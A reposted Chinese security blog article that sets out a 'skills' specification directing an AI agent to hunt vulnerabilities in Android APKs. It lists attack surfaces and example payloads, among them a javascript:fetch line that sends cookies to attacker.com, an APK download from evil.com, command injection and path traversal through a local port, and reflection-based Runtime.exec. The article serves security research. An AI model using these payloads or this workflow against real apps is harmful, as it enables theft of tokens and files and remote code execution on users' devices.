Androidapk客户端黑盒漏洞挖掘skills

admin 2026-08-17 07:45:58 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文提供了一套面向AI智能体的AndroidAPK客户端黑盒漏洞挖掘技能规范。文档明确指定了Jadx与Apktool等逆向工具的使用要求,详细梳理了DeepLink、Intent、WebView跨域与JSBridge等核心攻击面及对应的钓鱼、文件读取、命令注入和RCE等漏洞案例。核心要点在于强调严格验证机制,要求通过逆向代码层面确认漏洞真实性,剔除仅具攻击面而无实际危害的虚假漏洞。此外规范了攻击面与漏洞的标准化输出格式,并建议缓存关键信息以防上下文丢失,其实际价值在于高效定位攻击面方向。 综合评分: 85 文章分类: 移动安全,渗透测试,漏洞分析,逆向分析,WEB安全


cover_image

Android apk客户端黑盒漏洞挖掘skills

原创

鬼麦子 鬼麦子

鬼麦子

2026年7月19日 21:16 陕西

在小说阅读器读本章

去阅读

---name: client-side-huntingdescription: 对Android apk进行漏洞挖掘。---
# Android apk客户端黑盒漏洞挖掘
支持Android客户端,很多东西没必要全量读取,即费上下文又费token,尽量读关键位置,比如关键位置的上下文几千,不必要的输出也别输出,不可修改目标项目的任何文件内容。
只可以使用以下工具:
- PowerShell(主战)- cmd- python- jadx.bat      工具安装目录 D:\hack_tools\jadx\bin,该工具反编译大项目会很慢,不要设置超时,必须运行完成- apktool_3.0.2.jar    工具安装目录 D:\hack_tools\apktool- curl.exe

用好工具,反编译逆向用于进行深度漏洞挖掘,如存在攻击面的函数变量深度追踪,危险函数变量的深度追踪。

### 攻击面分析
1. 客户端功能分类,如社交、电商、金融、游戏、工具客户端等,根据相应的功能,有相应的攻击面
2. 客户端是否存在账号登录情况,账号密码、鉴权参数都是值得详细分析功能的攻击面
3. Deep Link / App Link 自定义协议路由
4. intent://  类似自定义协议
5. WebView  File协议跨域
6. javascript接口 (JSBridge、addJavascriptInterface)
7. CVE漏洞攻击,如低版本chrome关闭沙箱,可通过chrome exp打
8. 客户端程序在本地开启的 HTTP/Socket 侦听端口

深入攻击面的代码逻辑与功能逻辑,功能即漏洞,先有功能后有漏洞,先挖掘理解功能,把具体功能和参数,甚至参数值都要理解到。

### 攻击面案例
1. myapp://?url=http://evil.com/phishing.html    Deep Link参数校验不严,导致加载任意钓鱼/恶意页面,若结合JSBridge可扩大危害2. myapp://?url=file:///data/data/com.target.app/shared_prefs/token.xml    WebView配置允许File读写,伪协议导致读取App私有敏感文件3. http://127.0.0.1:1239/api/open?url=http://www.xxx.com     端口参数校验不严,导致加载任意钓鱼/恶意页面,若结合JSBridge可扩大危害4. intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;S.browser_fallback_url=https%3A%2F%2Fexample.com;end   导致加载任意钓鱼/恶意页面,若结合JSBridge可扩大危害5. 社交软件可以进行聊天、消息发送接受、文件传输,如发送特权域名url,点击url后,客户端会自动带cookie或token等鉴权参数,http://www.xxx.com/变成http://www.xxx.com/?token=aaaa...,但是url验证不严谨http://[email protected]/?token=aaaa...6. 客户端可控输出点的xss,如在聊天界面图片、视频、字符,造成file域或特权域XSS7. 客户端可控输出点,如在聊天界面图片、视频、字符会造成程序崩溃,造成拒绝服务

### 漏洞案例
1. myapp://?url=http://evil.com/phishing.html    Deep Link参数校验不严,导致加载任意钓鱼/恶意页面,若结合JSBridge可扩大危害2. myapp://?url=file:///data/data/com.target.app/shared_prefs/token.xml    WebView配置允许File读写,伪协议导致读取App私有敏感文件3. myapp://webview?url=javascript:fetch('http://attacker.com/?cookie='+document.cookie)    XSS或JS注入导致Token/Cookie窃取4. intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;S.browser_fallback_url=https%3A%2F%2Fexample.com;end   导致加载任意钓鱼/恶意页面,若结合JSBridge可扩大危害5. http://127.0.0.1:1239/api/exec?cmd=id    App本地投屏或IPC端口暴露,参数未校验导致命令注入/RCE6. http://127.0.0.1:1239/api/upload?path=../../../data/data/com.target.app/lib/libtest.so   本地端口目录穿越,覆盖SO文件导致下次启动时RCE7. window.xxbridge.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('id')    (老旧系统/特定SDK) WebView中暴露的对象通过反射执行系统命令导致RCE8. window.appInterface.getUserInfo()    WebView内嵌JS接口未做鉴权,任意恶意网页可直接获取用户敏感信息9. window.appInterface.get_location()    WebView内嵌JS接口未做鉴权,任意恶意网页可直接获取地址敏感信息10. window.appInterface.get_contact()    WebView内嵌JS接口未做鉴权,任意恶意网页可直接获取通讯录敏感信息11. window.appInterface.downloadAndInstall("http://evil.com/1.apk")    JS Bridge特权接口滥用,导致任意应用安装或代码执行12. window.appInterface.readfile("file:///etc/hosts")    JS Bridge特权接口滥用,导致任意文件读取13. 如某社交聊天软件,发送构造过的图片或视频,导致接受方客户端拒绝服务14. 如某社交聊天软件,发送构造字符payload,聊天界面支持富文本预览,触发XSS漏洞15. 如某社交聊天软件,发送构造字符payload,发文章、评论区支持富文本预览,触发XSS漏洞16. 如某金融网站,设置个人资料处为构造字符payload,其他用户访问其资料页面触发客户端特权域或file域XSS漏洞

### 漏洞验证
1. 虚假漏洞案例: myapp://page/webview?url=http://evil.com/phishing.html      如从某些点看起来,这样就可以执行,实际上url参数在某些地方已经没安全过滤了,所以是虚假漏洞,而且这本来也不是漏洞,只是个攻击面。2.   window.test.test({"openurl":"file:///etc/hosts"})     这种是必须某些域名下才能执行,如果不能绕过或者有特权域的xss,也是虚假漏洞。3. 如某聊天界面存在用户交互聊天功能并且支持富文本功能,但是该富文本被严格的安全过滤或开启了严格的CSP内容安全策略,无法绕过过滤的话,也是虚假漏洞。
所以发现漏洞后,二次验证,必须是可靠漏洞,跟踪整个链路,通过逆向反编译,代码层面验证过或者实际验证过的真实漏洞,可以进行远程攻击的漏洞,不要有恶意exp之类验证,获取到敏感信息或者/etc/hosts即可

### 项目缓存
可在当前工作区建立个文件夹存放md文件,保存攻击面、挖掘过程、重要功能背后的代码逻辑等重要信息,避免超出上下文后,记忆压缩后,对重要信息的遗忘,以及重复测试。

### 输出标准
1. 客户端攻击面、类型、攻击面描述、可能导致出现的漏洞(绝不允许有其他输出)2. 客户端路径、exp、漏洞等级、漏洞类型。(绝不允许有其他输出,必须是可靠漏洞,通过逆向反编译,代码层面验证过或者实际验证过的真实漏洞,可以进行远程攻击的漏洞)3. exp.html 证明

其实和之前客户端漏洞skills一样没啥区别,效果没有之前客户端skills好,Android原生安全还是太好了… 但是找几个攻击面方向还是可以的。


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:鬼麦子 鬼麦子 鬼麦子《Android apk客户端黑盒漏洞挖掘skills》

评论:0   参与:  0